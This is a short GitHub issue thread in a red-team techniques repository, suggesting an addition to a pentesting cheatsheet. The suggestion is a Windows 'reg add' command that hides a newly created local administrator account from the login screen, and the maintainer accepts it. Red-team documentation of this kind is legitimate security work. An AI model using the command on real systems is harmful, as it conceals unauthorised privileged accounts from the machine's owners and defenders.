### ISSUE TITLE
Suggestion for pentesting cheatsheet

### ISSUE THREAD

**Issue by dellasorte** [mantvydasb/RedTeam-Tactics-and-Techniques#5]
Hi. I suggest to add a small trick under this section
https://ired.team/offensive-security-experiments/offensive-security-cheetsheets#creating-user-and-adding-to-local-administrators

Hide newly created local administrator
`reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v spotless /d 0 /f`

**Comment by mantvydasb** [comment]
Thank you! Added.
